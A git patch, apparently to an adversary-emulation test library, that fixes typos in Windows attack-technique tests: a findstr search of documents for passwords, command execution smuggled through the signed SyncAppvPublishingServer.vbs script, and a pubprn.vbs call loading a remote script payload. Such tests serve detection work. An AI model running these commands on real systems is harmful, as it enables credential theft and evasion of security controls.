From dd4783b2a5c7eec01d5f3434054328d2cb358b9d Mon Sep 17 00:00:00 2001 From: Brian Thacker Date: Tue, 11 Feb 2020 15:36:21 -0600 Subject: [PATCH] Fixed typo 1216 1081 (#830) * Typo Test 3 findstr /si pass *.xml | *.doc | *.txt | *.xls -> findstr /si pass *.xml *.doc *.txt *.xls * Typo Test 2 SyncAppvPublishingServe -> SyncAppvPublishingServer Quotes in test 2 of a format not recognizable by Powershell when passed. Changed to regular quotes. --- atomics/T1081/T1081.yaml | 2 +- atomics/T1216/T1216.yaml | 6 +++--- 2 files changed, 4 insertions(+), 4 deletions(-) diff --git a/atomics/T1081/T1081.yaml b/atomics/T1081/T1081.yaml index bc2deeae..01688165 100644 --- a/atomics/T1081/T1081.yaml +++ b/atomics/T1081/T1081.yaml @@ -40,7 +40,7 @@ atomic_tests: name: powershell elevation_required: false command: | - findstr /si pass *.xml | *.doc | *.txt | *.xls + findstr /si pass *.xml *.doc *.txt *.xls ls -R | select-string -Pattern password - name: Access unattend.xml diff --git a/atomics/T1216/T1216.yaml b/atomics/T1216/T1216.yaml index 380f3e80..6aa42647 100644 --- a/atomics/T1216/T1216.yaml +++ b/atomics/T1216/T1216.yaml @@ -22,9 +22,9 @@ atomic_tests: command: | cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "script:#{remote_payload}" -- name: SyncAppvPublishingServe Signed Script PowerShell Command Execution +- name: SyncAppvPublishingServer Signed Script PowerShell Command Execution description: | - Executes the signed SyncAppvPublishingServe script with options to execute an arbitrary PowerShell command. + Executes the signed SyncAppvPublishingServer script with options to execute an arbitrary PowerShell command. supported_platforms: - windows @@ -39,7 +39,7 @@ atomic_tests: name: command_prompt elevation_required: false command: | - C:\windows\system32\SyncAppvPublishingServe.vbs “\n;#{command_to_execute}” + C:\windows\system32\SyncAppvPublishingServer.vbs "\n;#{command_to_execute}" - name: manage-bde.wsf Signed Script Command Execution description: |